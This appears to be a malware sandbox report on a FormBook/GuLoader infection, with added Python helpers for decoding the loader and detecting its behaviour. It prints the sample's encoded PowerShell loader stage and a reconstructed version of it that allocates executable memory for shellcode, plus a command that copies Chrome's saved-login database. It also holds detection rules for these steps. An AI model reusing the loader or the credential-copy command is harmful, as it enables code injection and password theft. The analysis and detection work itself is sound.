Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 6392 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAb
gB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…" (same encoded payload as the preceding entry, elided) Jump to behavior
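The "Encrypted powershell cmdline option found" and "Very long cmdline option found" entries above are two views of one artifact: a `-EncodedCommand` blob (base64 of UTF-16LE text) whose decoded form declares P/Invoke stubs for NtAllocateVirtualMemory, CreateFileA, ReadFile and CallWindowProcW, allocates 1048576 bytes with allocation type 12288 and protection 64, and names a staging file under %TEMP%. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it round-trips a constructed copy of the decoded stage through the `-EncodedCommand` encoding, strips the junk comment and Test-Path lines, pulls out the imported APIs, and translates the numeric constants to the Win32 flag names. The sample text is trimmed from the decoded script above; the truncated-blob handling, the flag tables and the "RWX + ReadFile + CallWindowProcW" heuristic are mine.

```python
import base64
import re

# Constructed sample input: the opening of the decoded GuLoader stage recorded in
# this report, trimmed to its essential lines, with the original line breaks
# restored. The "#..." lines and the Danish-looking identifiers are the loader's
# own junk; only the P/Invoke block, the allocation call and the staged file matter.
STAGE_SOURCE = (
    "#Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas\r\n"
    "Add-Type -TypeDefinition @\"\r\n"
    "using System;\r\n"
    "using System.Runtime.InteropServices;\r\n"
    "public static class bidrags1\r\n"
    "{\r\n"
    "[DllImport(\"ntdll.dll\")]public static extern int NtAllocateVirtualMemory("
    "int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);\r\n"
    "[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateFileA("
    "string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);\r\n"
    "[DllImport(\"kernel32.dll\")]public static extern int ReadFile("
    "int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);\r\n"
    "[DllImport(\"user32.dll\")]public static extern IntPtr CallWindowProcW("
    "IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);\r\n"
    "}\r\n"
    "\"@\r\n"
    "#Berigning balust Fjert Splintri7 Melanists\r\n"
    "Test-Path \"objekt\"\r\n"
    "$bidrags3=0;\r\n"
    "$bidrags9=1048576;\r\n"
    "$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)\r\n"
    "$bidrags2=\"$env:temp\" + \"\\FORSVARL.dat\"\r\n"
)

# Win32 constants for the last two NtAllocateVirtualMemory arguments.
ALLOCATION_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
                   0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

JUNK_LINE = re.compile(r'^\s*(#.*|Test-Path\s+"[^"]*")\s*$')
PINVOKE = re.compile(r'\[DllImport\("([^"]+)"\)\]\s*public static extern \S+ (\w+)\(')
ALLOC_CALL = re.compile(r'NtAllocateVirtualMemory\(\s*(-?\d+)\s*,\s*\[ref\]\$(\w+)\s*,'
                        r'\s*(\d+)\s*,\s*\[ref\]\$(\w+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)')
STAGE_FILE = re.compile(r'"\$env:temp"\s*\+\s*"(\\[^"]+)"')


def encode_command(script: str) -> str:
    """Produce what powershell.exe -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse of encode_command; tolerates a blob cut off mid-quartet (as in a truncated report)."""
    blob = "".join(blob.split())
    blob = blob[: len(blob) - len(blob) % 4]          # drop a dangling partial base64 group
    raw = base64.b64decode(blob)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")  # drop a dangling half code unit


def strip_junk(script: str) -> str:
    """Remove the loader's comment padding and no-op Test-Path calls."""
    return "\n".join(ln for ln in script.splitlines() if ln.strip() and not JUNK_LINE.match(ln))


def pinvoke_imports(script: str) -> list:
    """(dll, function) pairs declared through Add-Type / DllImport."""
    return [(dll.lower(), fn) for dll, fn in PINVOKE.findall(script)]


def allocation_summary(script: str):
    """Decode the NtAllocateVirtualMemory call: target process, size, flags, protection."""
    m = ALLOC_CALL.search(script)
    if not m:
        return None
    handle, _base_var, _zero_bits, size_var, alloc_type, protect = m.groups()
    size_m = re.search(r"\$" + re.escape(size_var) + r"\b\s*=\s*(\d+)", script)
    return {
        "process": "self (-1 = NtCurrentProcess)" if int(handle) == -1 else handle,
        "size": int(size_m.group(1)) if size_m else None,
        "allocation_type": [n for bit, n in ALLOCATION_TYPE.items() if int(alloc_type) & bit],
        "protect": PAGE_PROTECT.get(int(protect), hex(int(protect))),
    }


def triage(blob: str) -> dict:
    """Decode an -EncodedCommand blob and summarise the shellcode-loader indicators in it."""
    script = strip_junk(decode_command(blob))
    imports = pinvoke_imports(script)
    alloc = allocation_summary(script)
    stage = STAGE_FILE.search(script)
    names = {fn for _, fn in imports}
    # Heuristic (mine): an RWX allocation plus a file read plus CallWindowProcW is the
    # "read payload from disk, run it through a user32 callback" loader pattern.
    rwx_loader = (alloc is not None and alloc["protect"] == "PAGE_EXECUTE_READWRITE"
                  and {"ReadFile", "CallWindowProcW"} <= names)
    return {"imports": imports, "allocation": alloc,
            "stage_file": ("%TEMP%" + stage.group(1)) if stage else None,
            "rwx_staged_shellcode": rwx_loader}
```

Run `triage(encode_command(STAGE_SOURCE))` to see the decoded view of the constructed sample; on a real report paste the `-EncodedCommand` value straight into `triage`, since whitespace and a cut-off tail are tolerated. The allocation summary (1 MiB, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE in the current process) is what separates this stage from ordinary Add-Type usage, which never needs an executable heap.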
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…" (same encoded payload as listed under "Very long cmdline option found", elided) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
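The process-creation entries above give the whole execution chain: wscript.exe launches powershell.exe with a multi-kilobyte `-EncodedCommand`, PowerShell compiles the Add-Type stub through csc.exe/cvtres.exe and then starts ieinstal.exe with no arguments (the suspended host that is later hollowed), and a hollowed cmstp.exe runs `cmd.exe /c copy` against Chrome's Login Data. Each hop is a parent/child pair that a process-creation log records. The Python below is an added example of turning those pairs into detection logic; it is not part of the Joe Sandbox report and not a published Sigma rule. The events are constructed, simplified Sysmon Event ID 1 records built from the command lines in this report plus two benign ones, the 6 KB blob is stand-in padding, the rule names and the 2048-character threshold are mine, and the "Web Data" and "logins.json" names extend the report's "Login Data" to other browser credential stores as a generalization.

```python
import re

# Constructed events (simplified Sysmon Event ID 1 fields). Events 0-3 follow the
# chain in this report; 4 and 5 are benign scripting noise the rules must ignore.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     # stand-in for the real ~6 KB blob: repeated base64 padding, not the sample's payload
     "CommandLine": 'powershell.exe -EncodedCommand "' + "IwBSAHYAZQBuACAA" * 400 + '"'},
    {"ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Program Files (x86)\Internet Explorer\ieinstal.exe",
     "CommandLine": r'"C:\Program Files (x86)\internet explorer\ieinstal.exe"'},
    {"ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline"'},
    {"ParentImage": r"C:\Windows\SysWOW64\cmstp.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c net use Z: \\fileserver\share"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
HOLLOW_HOSTS = ("ieinstal.exe", "cmstp.exe")   # the two injection targets seen in this report
LONG_CMDLINE = 2048                            # assumption: tune against your own baseline
CRED_STORES = re.compile(r"\\(Login Data|Web Data|logins\.json)\b", re.I)
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the (possibly quoted) image path on the command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        rest = cmdline[end + 1:] if end != -1 else ""
    else:
        rest = cmdline.split(" ", 1)[1] if " " in cmdline else ""
    return rest.strip() != ""


def rule_encoded_powershell_from_script_host(ev) -> bool:
    # "Wscript starts Powershell" + "Encrypted powershell cmdline option found"
    return (basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and basename(ev["Image"]) == "powershell.exe"
            and ENCODED_FLAG.search(ev["CommandLine"]) is not None)


def rule_very_long_cmdline(ev) -> bool:
    # "Very long command line found"
    return len(ev["CommandLine"]) > LONG_CMDLINE


def rule_powershell_spawns_hollow_host(ev) -> bool:
    # "Creates a process in suspended mode": PowerShell launching a GUI installer/helper
    # with no arguments has no legitimate purpose; it is a host waiting to be hollowed.
    return (basename(ev["ParentImage"]) == "powershell.exe"
            and basename(ev["Image"]) in HOLLOW_HOSTS
            and not has_arguments(ev["CommandLine"]))


def rule_cmstp_spawns_shell(ev) -> bool:
    # In the spirit of the Sigma "CMSTP Execution Process Creation" hit: cmstp.exe
    # installs connection-manager profiles and should not be a parent of a shell.
    return (basename(ev["ParentImage"]) == "cmstp.exe"
            and basename(ev["Image"]) in ("cmd.exe", "powershell.exe", "rundll32.exe"))


def rule_browser_credential_store_copy(ev) -> bool:
    # "Tries to harvest and steal browser information": copying the SQLite store out
    # of the profile directory sidesteps the lock the running browser holds on it.
    cl = ev["CommandLine"]
    return (basename(ev["Image"]) == "cmd.exe"
            and re.search(r"\bcopy\b", cl, re.I) is not None
            and CRED_STORES.search(cl) is not None)


RULES = [
    ("encoded_powershell_from_script_host", rule_encoded_powershell_from_script_host),
    ("very_long_cmdline", rule_very_long_cmdline),
    ("powershell_spawns_hollow_host", rule_powershell_spawns_hollow_host),
    ("cmstp_spawns_shell", rule_cmstp_spawns_shell),
    ("browser_credential_store_copy", rule_browser_credential_store_copy),
]


def evaluate(events) -> dict:
    """Map event index -> names of the rules that fired, for events with at least one hit."""
    hits = {}
    for i, ev in enumerate(events):
        fired = [name for name, fn in RULES if fn(ev)]
        if fired:
            hits[i] = fired
    return hits
```

`evaluate(EVENTS)` fires on events 0, 1 and 3 and stays silent on the csc.exe compile step and the two benign launches. The csc.exe child is deliberately not a rule on its own: every Add-Type call produces it, so it is corroboration for a parent that already matched, not a signal by itself. Correlating the three hits by process tree (wscript → powershell → ieinstal, then cmstp → cmd) is what lifts this from three medium alerts to one high-confidence loader chain.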
Source: cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000022.00000000.755846261.0000000004532000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.676433392.0000000004534000.00000004.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000016.00000000.527886714.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.585187723.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.578176779.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.566378249.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.554958634.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525253888.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574481518.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.549317340.00000000008B8000.00000004.00000020.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.715392182.0000000005120000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.758084456.0000000005120000.00000004.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp Binary or memory string: vProgram Manager
Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000022.00000000.702018769.00000000005F7000.00000004.00000020.sdmp, explorer.exe, 00000022.00000000.753310066.00000000005F7000.00000004.00000020.sdmp Binary or memory string: ProgmanS

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
